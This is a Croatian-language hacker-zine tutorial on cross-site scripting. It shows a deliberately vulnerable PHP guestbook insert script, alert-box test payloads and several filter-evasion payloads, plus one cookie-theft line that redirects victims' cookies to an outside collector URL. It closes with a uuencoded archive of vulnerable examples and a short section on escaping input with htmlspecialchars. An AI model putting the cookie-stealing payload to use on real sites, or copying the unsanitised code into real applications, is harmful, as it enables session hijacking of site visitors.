1x05 Cross Site Scripting with examples

Published in
· 14 Jan 2024
 
                            ................... 
                      ...::: phearless zine #1 :::... 
                   
...............>---[ Cross Site Scripting with examples ]---<............... 

..........................>---[ by Exoduks ]---<............................ 
                                                    exoduks[at]gmail[dot]com 

SADRZAJ: 

    [0]  Uvod 
    [1]  XSS - Sto je to  
    [2]  Za sto nam je XSS koristan  
    [3]  Dvije najcesce metode XSS napada  
    [4]  Primjeri i exploitovanje 
    [5]  Primjeri korisnog JavaScript koda 
    [6]  Zastita 
    [7]  EOF a.k.a THE END 

 
    ***  na kraju teksta se nalazi uuencodeovan XSS-examples.tar.gz sa primerima  
    ***  za exploitanje vezanim za ovaj tekst ! 

 
//////////////////////////////////////////////////////////////////////////// 
--==<[ 0. Uvod 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    U ovom tekstu cu vam pisati o Cross Site Scripting propustu u web  
aplikacijama. Inace XSS propust je dosta rasiren i programeri premalo pozornosti  
posvecuju sigurnosti web aplikacija.    
    Cross Site Scripting ili skraceno CSS koji mnoge asocira na Cascading  
Style Sheet i ako jedno s drugim nemaju nikakve veze. Jos je i poznat pod  
nazivom koji se najcesce upotrebljava, a to je XSS koji cu i ja u daljnjem  
dijelu koristiti.  

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 1. XSS - Sto je to  
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    XSS je propust koji se javlja kad neka web aplikacija dobije zlonamjerne  
podatke od korisnika, u najcescem slucaju taj zahjtev sadrzi JavaScript,  
HTML, VBScript ili neki drugi kod. Jednom kad web aplikacija zaprimi takav  
kod prosljeduje ga korisnku gdje njegov web browser izvrsi zlonamjerni kod.  

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 2. Za sto nam je XSS koristan  
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    XSS je beskoristan ako zlonamjerni kod izvrsi vas browser na vasem  
racunalu, jer dobijete vlastite podatke, a to mozete dobiti i bez toga,  
stoga se XSS primjenjuje na neku osobu od koje zelite dobiti odredjene  
podatke, natjerate da web aplikacija zlonamjerni kod prosljedi njegovom  
browseru koji to izvrsava na njegovom racunalu. XSS se najcesce koristi za  
dobijanje cookie-a i session-a.  

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 3. Dvije najjace metode XSS napada 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Prva metoda je kada korisnik posalje web aplikaciji zlonamjerni kod i  
ona ga spremi negdje na serveru (u neku bazu, neki fajl ili nesto trece) i  
svaki put kada neki korisnik ucita odredjenu stranicu web aplikacija sa  
servera ucitava zlonamjerni kod i salje ga korisniku koji je posjetio tu  
stranicu. 
    Druga metoda je da se "zlonamjerni kod" ne pohranjuje na serveru nego ga 
korisnik unosi nekim putem u web aplikaciju i ona mu ga proslijeduje natrag,  
te se kod zatim izvrsava.  
    Prva metoda je korisnija od ove druge jer je laksa za exploitati. U 2-oj  
metodi moramo natjerati na neki nacin zrtvu da ona sama unese zlonamjerni  
kod koji ce se izvrsiti na zrtvinom racunalu i poslate podatke nama. 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 4. Primjeri i exploitanje 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Kao sto sam vec napomenuo uz ova tekst prilozeni se u primjeri ranjivih  
web aplikacija, koje ste trebali vec instalirati. Prvo sa vasim browserom  
posjetite: 
     
    http://www.server.com/XSS-primjer/index.php  
     
...i pokrenut ce se aplikacija koja ce vam ispisati sadrzaj baze, na ovom  
principu rade forumi, razne knjige gostiju, a velik broj njih je ranjiv na  
XSS, pogotovo one manje poznate. Nas u ovom dijelu ne zanima kod index.php  
stranice pa ga necu objasnjavati.  
    Kliknite na link koji se nalazi na index.php stranici "Dodaj tekst !"  
koji vodi do strance sa formom za unos texta "add.html"(simulacija dodavanja  
posta na forumu ili knjigi gostiju). Na toj stranici za pocetak cemo unijeti  
pod naslov "Proba", a pod tekst "Blabalbal" nakon unosa pritisnite submit.  
Nakon toga trebalo bi vam se pojaviti Uspjesno dodano. Zatim opet posjetite  
"index.php" na kojoj cete vidjeti text koji ste unijeli preko forme.  

Zatim otvorite add.php i pogledajte sljedeci kod: 

------- star code -------  
  <?php 
    include("config.php"); 

    $naslov = $_POST['naslov']; 
    $text = $_POST['text']; 

    mysql_connect($server, $dbuser, $dbpass); 
    mysql_select_db($database) or die("Greska u spajanju na bazu !"); 

    $query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')"; 
    mysql_query($query); 
    mysql_close(); 

    echo "Dodano u bazu !"; 

  ?> 
------- end code -------  

Idemo sad malo razjasniti kod: 
  
... 
include("config.php");  
... 
  - ukljucuje se fajl config.php u kojem su smjesteni podaci za spajanje na  
bazu. 

 
... 
$naslov = $_POST['naslov'];  
$text = $_POST['text'];  
... 
  - ove dvije varijable hvataju POST zahtjev od add.html forme, posto nema       
    nikakve provjere za sadrzajem tih dviju varijabli mozemo bez problema     
    unijeti zlonmajerni kod, kao sto cete vidjeti sami. 

 
... 
mysql_connect($server, $dbuser, $dbpass); 
mysql_select_db($database) or die("Greska u spajanju na bazu !"); 

$query = "INSERT INTO XSS_primjer1 VALUES ('$naslov', '$text')"; 
mysql_query($query); 
mysql_close(); 

echo "Dodano u bazu !"; 
 ... 
  - funkcije za spajanje na bazu i dodavanje sadrzaja varijabli $naslov i  
    $text u bazu, ali taj dio i nije toliko vazan. 

 
Znaci koliko vidimo iz gornjeg koda nema provjere ulaznih varijabli $naslov  
i $text stoga je XSS napad moguc pa idemo da vidiom i to. 

 
 - sa browserom posjetite add.html i u polje naslov stavite "proba - xss"  
   a pod text stavite sljedeci JavaScript kod: 

     <script>alert('XSS primjer 1 - exploited !');</script> 

- nakon sto ste unijeli kliknite na submit i zatim ponovno otidite na  
  index.php stranicu. 

- odmah nakon sto se stranica ucita iskocit ce vam prozor sa porukem "XSS   
  primjer 1 - exploited !" 

- kao sto smo i predpostavili moguce je unijeti kod i sremiti ga u bazu te  
  ce se izvrsiti na svim korisncima koji posjete tu stranicu. 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 5. Primjeri korisnog JavaScript koda 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

<script>alert('Lamed !');</script> 

<script>alert(document.cookie);</script> 

<script>document.location='http://server/cookie.php?'+document.cookie</script> 

<IMG SRC="javascript:alert('Lamed!');"> 

<BODY BACKGROUND="javascript:alert('Lamed !')"> 

<LINK REL="stylesheet" HREF="javascript:alert('Lamed !');"> 

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('Lamed !');"> 

<BODY ONLOAD=alert('Lamed !')> 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 6. Zastita 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Najbolja zastita protiv XSS napada je da se filtriraju sve ulazne  
varijable. To se moze uciniti putem gotovih funkcija ili mozete napisati  
neke provjere da li varijabla sadrzi npr. "script", i tagove <> !  
Evo vam nekih funkcija u php-u koje se za to koriste, najcesce u kombinaciji 
s nekom drugom funkcijom drugom: 

// from php menual 

eregi_replace    --  Replace regular expression case insensitive 
                     This function is identical to ereg_replace()  
                     except that this ignores case distinction when  
                     matching alphabetic characters.  

htmlspecialchars --  Convert special characters to HTML entities 
                     This function is useful in preventing user-supplied  
                     text from containing HTML markup, such as in a message  
                     board or guest book application.  

Idemo vidjeti sto bi se dogodilo da u kod od add.php jos dodamo sljdeci kod: 

Ispod: 
... 
$naslov = $_POST['naslov']; 
$text = $_POST['text']; 
... 

Dodamo jos: 
... 
$naslov = htmlspecialchars($naslov); 
$text = htmlspecialchars($text); 
... 

Idemo sada vidjeti sto ce se dogoditi ako opet u aplikaciju unesemo javascript  
kod. Posjetite http://www.server.com/XSS-primjer/add.html i unesite i pod Naslovi  
pod Tekst <script>alert('XSS primjer 1 - exploited !');</script>. Zatim kliknite  
na submit. Primjetit cete da nam nace iskociti prozor nego ce nam se javascript kod 
koji smo unijeli ispisati ali se nece izvrsiti. 

 

//////////////////////////////////////////////////////////////////////////// 
--==<[ 7. EOF a.k.a THE END 
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 

    Dosli ste na kraj ovog teksta koji je trebao biti malo duzi ali zbog  
pozurivanja :) morao sam to malo skratiti. Pozdravljam sve koje poznam :)  
neda mi se pisati sada listu ! Nemojte zamjeriti na gramatickim greskama. 
BTW. posjetite www.hackgen.org ! 

 

begin 644 xss-examples.tar.gz 
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 
0AH:&QC>)_P$@-@#I`'@````` 
` 
end 
sum -r/size 19780/2401
1x05 Cross Site Scripting with examples

Share this article

Let's discover also

A few examples of sliding-window memory management in Nintendo 64 games

Examples of booting different file types

GP32 Palette Configuration and Examples

7Sk1: WSH (Windows Scripting Host) - tutorial

1x11 Mirc Scripting - Basics

2500Hz Issue 02 - 01 Introduccion al mIRC Scripting

2500Hz Issue 02 - 07 Shell Scripting en Sistemas UNIX (I)

0x06: Scripting para mIRC

NULL mag Issue 03 16 Tips for cross compiling apps

HIR Issue 7: Cross-platform fun with Virtual Networking Computing

Recent Articles

🍰🍇Mini Blackberry Pavlovas

Creamy Thai Turmeric Chicken and Noodles

PANCAKES SALATI

The enigma of Caral, the oldest city in America

The fortress of Trinchera

The Toba catastrophe, when Homo Sapiens was in real danger of extinction

The black chiefs of Esmeraldas

The symbolism of the petroglyphs of Toro Muerto and the geoglyphs of Aplao

Did America's Third Empire Really Exist? The mystery of the Omagua culture

The Tikuna ethnic group

Recent Comments
